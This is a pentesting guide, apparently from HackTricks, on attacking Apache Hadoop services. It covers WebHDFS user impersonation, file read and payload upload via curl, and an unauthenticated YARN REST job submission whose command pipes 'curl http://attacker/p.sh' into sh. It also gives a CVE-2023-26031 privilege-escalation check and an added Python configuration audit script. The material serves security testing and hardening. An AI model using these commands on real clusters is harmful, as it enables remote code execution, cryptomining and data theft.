50030-50060-50070-50075-50090 - Pentesting Hadoop

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Apache Hadoop is an open-source framework for distributed storage and processing of large data sets across clusters of computers. It uses HDFS for storage and MapReduce for processing.

Default ports used:

  • 50070 / 9870 NameNode (WebHDFS)
  • 50075 / 9864 DataNode
  • 50090 Secondary NameNode
  • 8088 YARN ResourceManager web UI & REST
  • 8042 YARN NodeManager
  • 8031/8032 YARN RPC (often overlooked and still unauthenticated in many installations)

Unfortunately, Hadoop is not supported in the Metasploit framework at the time of writing. However, you can use the following Nmap scripts to enumerate Hadoop services:

  • hadoop-jobtracker-info (Port 50030)
  • hadoop-tasktracker-info (Port 50060)
  • hadoop-namenode-info (Port 50070)
  • hadoop-datanode-info (Port 50075)
  • hadoop-secondary-namenode-info (Port 50090)

It is important to note that Hadoop runs without authentication in its default configuration. However, for improved security, there are configurations that integrate Kerberos with the HDFS, YARN, and MapReduce services.

WebHDFS / HttpFS abuse (50070/9870 or 14000)

When security=off you can impersonate any user via the user.name parameter. Some quick tricks:

# list root directory
curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

# read arbitrary file from HDFS
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"

# upload a web shell / binary
curl -X PUT -T ./payload "http://<host>:50070/webhdfs/v1/tmp/payload?op=CREATE&overwrite=true&user.name=hdfs" -H 'Content-Type: application/octet-stream'

If HttpFS is enabled (default port 14000) the same REST paths apply. Behind Kerberos you can still use curl --negotiate -u : with a valid ticket.

YARN unauth RCE (8088)

The ResourceManager REST API accepts application submissions without authentication in the default "simple" mode (static user dr.who). Attackers use it to run arbitrary commands (e.g. miners) without needing any HDFS write permission.

# 1) get an application id
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application

# 2) submit DistributedShell pointing to a command
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
  -H 'Content-Type: application/json' \
  -d '{
    "application-id":"application_1234567890000_0001",
    "application-name":"pwn",
    "am-container-spec":{
      "commands":{"command":"/bin/bash -c \"curl http://attacker/p.sh|sh\""}
    },
    "application-type":"YARN"
  }'

If the 8031/8032 RPC ports are exposed, older clusters allow the same job submission over protobuf without auth (documented in several cryptominer campaigns); treat those ports as RCE as well.
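As an added, defender-side example (not code from the original page), the following Python parses a Hadoop *-site.xml and flags the settings behind the WebHDFS impersonation and the unauthenticated YARN submission described above: simple authentication (user.name is trusted), anonymous HTTP access as the static user dr.who, and disabled YARN ACLs. Property names and their shipped defaults are Hadoop's own; the sample XML documents are constructed.

```python
import xml.etree.ElementTree as ET

# Real Hadoop property names with their shipped defaults (sample XML below is constructed).
DEFAULTS = {
    "hadoop.security.authentication": "simple",
    "hadoop.http.authentication.type": "simple",
    "hadoop.http.authentication.simple.anonymous.allowed": "true",
    "yarn.acl.enable": "false",
}
# (property, weak value, why it matters)
CHECKS = [
    ("hadoop.security.authentication", "simple",
     "WebHDFS/HttpFS trust the user.name query parameter (impersonation)"),
    ("hadoop.http.authentication.type", "simple",
     "web UIs and REST on 9870/8088 do not authenticate callers"),
    ("hadoop.http.authentication.simple.anonymous.allowed", "true",
     "anonymous callers act as the static user (dr.who) on the YARN REST API"),
    ("yarn.acl.enable", "false",
     "no YARN ACLs: anyone reaching 8088 may submit applications"),
]

def parse_site_xml(text):
    # Turn a <configuration> document into a {name: value} dict.
    props = {}
    for prop in ET.fromstring(text).findall("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props

def audit(props):
    # Unset properties fall back to Hadoop's default, which is the weak value for all four.
    findings = []
    for name, weak, why in CHECKS:
        actual = props.get(name, DEFAULTS[name]).lower()
        if actual == weak:
            findings.append(f"{name}={actual}: {why}")
    return findings

# Constructed samples: a stock cluster relying on defaults, and a hardened one.
DEFAULT_SITE = "<configuration><property><name>fs.defaultFS</name><value>hdfs://nn:8020</value></property></configuration>"
HARDENED_SITE = """<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>false</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
</configuration>"""

if __name__ == "__main__":
    for label, xml in (("defaults", DEFAULT_SITE), ("hardened", HARDENED_SITE)):
        print(label, audit(parse_site_xml(xml)) or ["no findings"])
```

Run it against the real core-site.xml, hdfs-site.xml and yarn-site.xml of a cluster (merged into one dict) to confirm Kerberos and ACLs are actually enforced rather than assumed.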

Local PrivEsc from YARN containers (CVE-2023-26031)

The Hadoop 3.3.1–3.3.4 container-executor loads libraries from a relative RUNPATH. A user who can run YARN containers (including remote submitters on insecure clusters) can place a malicious libcrypto.so in a writable path and obtain root when container-executor runs as SUID.

Quick check:

readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
# vulnerable if it contains $ORIGIN/:../lib/native/
ls -l /opt/hadoop/bin/container-executor   # SUID+root makes it exploitable

Fixed in 3.3.5; make sure the binary is not SUID if secure containers are not required.
